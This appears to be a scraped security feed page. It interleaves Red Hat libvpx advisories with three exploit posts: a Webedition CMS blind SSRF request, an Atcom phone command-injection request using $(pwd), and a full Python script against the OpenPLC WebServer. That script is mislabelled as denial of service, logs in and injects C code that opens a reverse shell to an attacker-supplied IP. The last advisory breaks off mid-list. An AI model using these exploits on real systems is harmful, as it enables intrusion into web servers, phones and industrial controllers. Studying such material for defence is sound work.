Webedition CMS version 2.9.8.8 suffers from a blind server-side request forgery vulnerability.

    Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRFApplication: Webedition CMSVersion: v2.9.8.8   Bugs:  Blind SSRFTechnology: PHPVendor URL: https://www.webedition.org/Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1Date of found: 07.09.2023Author: Mirabbas AğalarovTested on: Linux 2. Technical Details & POC========================================write https://youserver/test.xml to we_cmd[0] parameterpoc requestPOST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1Host: localhostContent-Length: 141sec-ch-ua: Accept: application/json, text/javascript, */*; q=0.01Content-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36sec-ch-ua-platform: ""Origin: http://localhostSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: http://localhost/webEdition/index.php?we_cmd[0]=startWEAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300Connection: closewe_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3

Webedition CMS 2.9.8.8 Server-Side Request Forgery

Red Hat Security Advisory 2023-5534-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5534-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5534  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.2  
Advanced Update Support, Red Hat Enterprise Linux 8.2 Telecommunications  
Update Service, and Red Hat Enterprise Linux 8.2 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v. 8.2) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v. 8.2) - ppc64le, x86_64  
Red Hat Enterprise Linux AppStream TUS (v. 8.2) - x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream E4S (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

ppc64le:  
libvpx-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-debugsource-1.7.0-8.el8_2.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.ppc64le.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

Red Hat Enterprise Linux AppStream TUS (v. 8.2):

Source:  
libvpx-1.7.0-8.el8_2.src.rpm

x86_64:  
libvpx-1.7.0-8.el8_2.i686.rpm  
libvpx-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-debuginfo-1.7.0-8.el8_2.x86_64.rpm  
libvpx-debugsource-1.7.0-8.el8_2.i686.rpm  
libvpx-debugsource-1.7.0-8.el8_2.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.i686.rpm  
libvpx-utils-debuginfo-1.7.0-8.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvQAAoJENzjgjWX9erE5MwP/3TdlO7HiAnGJ45p1iFOMXLM  
5GFa9+26vPJhvWj/NRhcd1VCSc+bPqTVehX30TZBaa9fQOKxR2OeU5o/MVijpMvh  
FV7zLc9VMVx7AG6v3fmQ2zzqgONn5l2G/6dUaVfCJ70NXb5oj3sViPNZud0MSwGa  
H+smKKCIlsySoRri2ujipY79cB8HsBpGHsj939bNJ3d/gRuqksboxsRwuAMgwIMU  
bupdSx7PBNlhLB/hoTkvLRFIqi+xyHe+VdDTGz9RFdjpTtDbGzmeD8kOxR6S0Kbi  
84FtciojYSoxY6iSaiI7LKDenRYnbFUMr6jmcDhVH2rurJdY1ztMi2SYLXJnEwoi  
1Br1WocqgsV0HQHTIZhVY/r6pDuAC2difmZ2LZgYLUCmf0MWMjv4kn30mMwdPsJ7  
V+V72BIy5BN/ATvTggnprHXMxL17WfA0bbQMbJ+UG+Vq0kubfSMjn12nrEVTxVsc  
78tfFQN+ONUTOUFcr8uo5bs2t/PY0Jkb+Tguim0JqPeUqjkeDM/upA9OwyQSEr3S  
SYAbL00ia9ZvlyURm499xDZE87fJR6Jbs1ibXRawxZWWGIfYZX0VjOV0Yd+k2EGk  
iUX/z5hiTReb0TIekiciGYr+UhaVbZJNWbLruOzPh7UQ+RbF0NAmbIOUHPuY+iXK  
KXSj7YDnAe/TEyenfuKC  
=zUAg  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5534-01

OpenPLC WebServer version 3 suffers from a denial of service vulnerability.

    # Exploit Title: OpenPLC WebServer 3 - Denial of Service# Date: 10.09.2023# Exploit Author: Kai Feng# Vendor Homepage: https://autonomylogic.com/# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git# Version: Version 3 and 2# Tested on: Ubuntu 20.04import requestsimport sysimport timeimport optparseimport reparser = optparse.OptionParser()parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)")parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login")parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login")parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection")parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection")options, args = parser.parse_args()if not options.url:    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    print('[+] Specify an url target')    print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444")    exit()host = options.urllogin = options.url + '/login' upload_program = options.url + '/programs'compile_program = options.url + '/compile-program?file=681871.st' run_plc_server = options.url + '/start_plc'user = options.userpassword = options.passwrev_ip = options.riprev_port = options.rportx = requests.Session()def auth():    print('[+] Remote Code Execution on OpenPLC_v3 WebServer')    time.sleep(1)    print('[+] Checking if host '+host+' is Up...')    host_up = x.get(host)    try:        if host_up.status_code == 200:            print('[+] Host Up! ...')    except:        print('[+] This host seems to be down :( ')        sys.exit(0)    print('[+] Trying to authenticate with credentials '+user+':'+password+'')     time.sleep(1)       submit = {        'username': user,        'password': password    }    x.post(login, data=submit)    response = x.get(upload_program)                if len(response.text) > 30000 and response.status_code == 200:        print('[+] Login success!')        time.sleep(1)    else:        print('[x] Login failed :(')        sys.exit(0)  def injection():    print('[+] PLC program uploading... ')    upload_url = host + "/upload-program"     upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"}    upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"}     upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n  VAR\n    var_in : BOOL;\n    var_out : BOOL;\n  END_VAR\n\n  var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n  RESOURCE Res0 ON PLC\n    TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n    PROGRAM Inst0 WITH Main : prog0;\n  END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n"    upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data)    act_url = host + "/upload-program-action"    act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"}    act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n"    upload_act = x.post(act_url, headers=act_headers, data=act_data)    time.sleep(2)def connection():    print('[+] add device...')    inject_url = host + "/add-modbus-device"    # inject_dash = host + "/dashboard"    inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"}    inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"}    inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111                                # \"ladder.h\"\r\n#include <stdio.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <stdlib.h>\r\n#include <unistd.h>\r\n#include <netinet/in.h>\r\n#include <arpa/inet.h>\r\n\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nint ignored_bool_inputs[] = {-1};\r\nint ignored_bool_outputs[] = {-1};\r\nint ignored_int_inputs[] = {-1};\r\nint ignored_int_outputs[] = {-1};\r\n\r\n//-----------------------------------------------------------------------------\r\n\r\n//-----------------------------------------------------------------------------\r\nvoid initCustomLayer()\r\n{\r\n   \r\n    \r\n    \r\n}\r\n\r\n\r\nvoid updateCustomIn()\r\n{\r\n\r\n}\r\n\r\n\r\nvoid updateCustomOut()\r\n{\r\n    int port = "+rev_port+";\r\n    struct sockaddr_in revsockaddr;\r\n\r\n    int sockt = socket(AF_INET, SOCK_STREAM, 0);\r\n    revsockaddr.sin_family = AF_INET;       \r\n    revsockaddr.sin_port = htons(port);\r\n    revsockaddr.sin_addr.s_addr = inet_addr(\""+rev_ip+"\");\r\n\r\n    connect(sockt, (struct sockaddr *) &revsockaddr, \r\n    sizeof(revsockaddr));\r\n    dup2(sockt, 0);\r\n    dup2(sockt, 1);\r\n    dup2(sockt, 2);\r\n\r\n    char * const argv[] = {\"/bin/sh\", NULL};\r\n    execve(\"/bin/sh\", argv, NULL);\r\n\r\n    return 0;  \r\n    \r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n-----------------------------289530314119386812901408558722--\r\n"    inject = x.post(inject_url, headers=inject_headers, cookies=inject_cookies, data=inject_data)    time.sleep(3)    # comp = x.get(compile_program)    # time.sleep(6)    # x.get(inject_dash)    # time.sleep(3)    # print('[+] Spawning Reverse Shell...')    start = x.get(run_plc_server)    time.sleep(1)    if start.status_code == 200:        print('[+] Reverse connection receveid!')         sys.exit(0)    else:        print('[+] Failed to receive connection :(')        sys.exit(0)auth()injection()connection()

OpenPLC WebServer 3 Denial Of Service

Red Hat Security Advisory 2023-5529-01 - The Berkeley Internet Name Domain is an implementation of the Domain Name System protocols. BIND includes a DNS server ; a resolver library ; and tools for verifying that the DNS server is operating correctly. Issues addressed include a denial of service vulnerability.

Red Hat Security Advisory 2023-5529-01

Red Hat Security Advisory 2023-5537-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5537-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5537  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux CRB (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
libvpx-1.7.0-10.el8_8.src.rpm

aarch64:  
libvpx-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.aarch64.rpm

ppc64le:  
libvpx-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.ppc64le.rpm

s390x:  
libvpx-1.7.0-10.el8_8.s390x.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_8.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.s390x.rpm

x86_64:  
libvpx-1.7.0-10.el8_8.i686.rpm  
libvpx-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_8.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.x86_64.rpm

Red Hat Enterprise Linux CRB (v. 8):

aarch64:  
libvpx-debuginfo-1.7.0-10.el8_8.aarch64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.aarch64.rpm  
libvpx-devel-1.7.0-10.el8_8.aarch64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.aarch64.rpm

ppc64le:  
libvpx-debuginfo-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-debugsource-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-devel-1.7.0-10.el8_8.ppc64le.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.ppc64le.rpm

s390x:  
libvpx-debuginfo-1.7.0-10.el8_8.s390x.rpm  
libvpx-debugsource-1.7.0-10.el8_8.s390x.rpm  
libvpx-devel-1.7.0-10.el8_8.s390x.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.s390x.rpm

x86_64:  
libvpx-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_8.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_8.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_8.x86_64.rpm  
libvpx-devel-1.7.0-10.el8_8.i686.rpm  
libvpx-devel-1.7.0-10.el8_8.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.i686.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-5217  
https://access.redhat.com/security/cve/CVE-2023-44488  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIcBAEBCAAGBQJlJBvLAAoJENzjgjWX9erEahUP/iXQ79lCk5ytBlnyduTi88a5  
umXetrpR8WsbbGyqx/ouILHA34c1G7sUX5SU6mrIlLUfSXvO/67yNJVzf3O6kTqm  
O/gEkO7RooygyskVu5sTl98SkZ7xOIhg7k1mqa5Ucgojm8wGu8jpcg+pWftGG+aK  
veRYSwFpwL+uybJghiJvv9mPgN69oE1dnXTfS6KgstnF+irpLQ4iPp3PgfH3nma7  
grWqR7E3Z1Mg4Qi2zFmD8Mat4iHprSe7UfztmMipq5Hv2OsmUOMbdtGvwD0zYjfA  
CEB71SFp1OeqZLKz6Vm0y7fYMYwlP5rRUe9P0o/qrY7nU0/XgbDMGBJuYErV0w+M  
qQMXE2gV7+u6LTzrL5+W0n8C+3NKatkR+BG2KDOf9iGgFgf+ugcZ117yU8uLFcRi  
JG3lBb6Bft9QtUBHODtA5cKn/uoHQw4k60JvE3IG11+N6q2n5GJevTdfY664So8X  
RDnow0pI3xugoPUG0UK74AanZM95ShNicXd8v9j3o4Ha9zp1laUgHg+CGmi3IdDe  
EuL2HpBbXdQDg5yjzaM+IrKj2ICkCI5DStVirknKxd4dMBGGbl+4RjlXl0CIBcVg  
lRPZB6UsAc23yq4zdM8RAazbgUkUDOSmD4MiVpj18qjpNtEbYnpLpJ+Gl2Go+pB5  
d8Fd2GhuQt+tMhHThYdr  
=92bt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-5537-01

Atcom version 2.7.x.x suffers from an authenticated remote code injection vulnerability.

    # Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection# Google Dork: N/A# Date: 07/09/2023# Exploit Author: Mohammed Adel# Vendor Homepage: https://www.atcom.cn/# Software Link:https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html# Version: All versions above 2.7.x.x# Tested on: Kali LinuxExploit Request:POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1Host: {TARGET_IP}User-Agent: polarContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestContent-Length: 49Authorization: Digest username="admin", realm="IP Phone WebConfiguration", nonce="value_here",uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping",response="value_here", qop=auth, nc=value_here, cnonce="value_here"cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_pingResponse:{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"}The value of "ping_cmd_result" is encoded as base64. Decoding thevalue of "ping_cmd_result" reveals the result of the command executedas shown below:ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin'

Atcom 2.7.x.x Command Injection

Red Hat Security Advisory 2023-5536-01 - The libvpx packages provide the VP8 SDK, which allows the encoding and decoding of the VP8 video codec, commonly used with the WebM multimedia container file format. Issues addressed include a buffer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: libvpx security update  
Advisory ID:       RHSA-2023:5536-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:5536  
Issue date:        2023-10-09  
CVE Names:         CVE-2023-5217 CVE-2023-44488   
=====================================================================

1. Summary:

An update for libvpx is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream AUS (v.8.4) - x86_64  
Red Hat Enterprise Linux AppStream E4S (v.8.4) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux AppStream TUS (v.8.4) - aarch64, ppc64le, s390x, x86_64

3. Description:

The libvpx packages provide the VP8 SDK, which allows the encoding and  
decoding of the VP8 video codec, commonly used with the WebM multimedia  
container file format.

Security Fix(es):

* libvpx: Heap buffer overflow in vp8 encoding in libvpx (CVE-2023-5217)

* libvpx: crash related to VP9 encoding in libvpx (CVE-2023-44488)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, all applications using libvpx must be  
restarted for the changes to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2241191 - CVE-2023-5217 libvpx: Heap buffer overflow in vp8 encoding in libvpx  
2241806 - CVE-2023-44488 libvpx: crash related to VP9 encoding in libvpx

6. Package List:

Red Hat Enterprise Linux AppStream AUS (v.8.4):

Source:  
libvpx-1.7.0-10.el8_4.src.rpm

x86_64:  
libvpx-1.7.0-10.el8_4.i686.rpm  
libvpx-1.7.0-10.el8_4.x86_64.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.i686.rpm  
libvpx-debuginfo-1.7.0-10.el8_4.x86_64.rpm  
libvpx-debugsource-1.7.0-10.el8_4.i686.rpm  
libvpx-debugsource-1.7.0-10.el8_4.x86_64.rpm  
libvpx-utils-debuginfo-1.7.0-10.el8_4.i686.rpm  
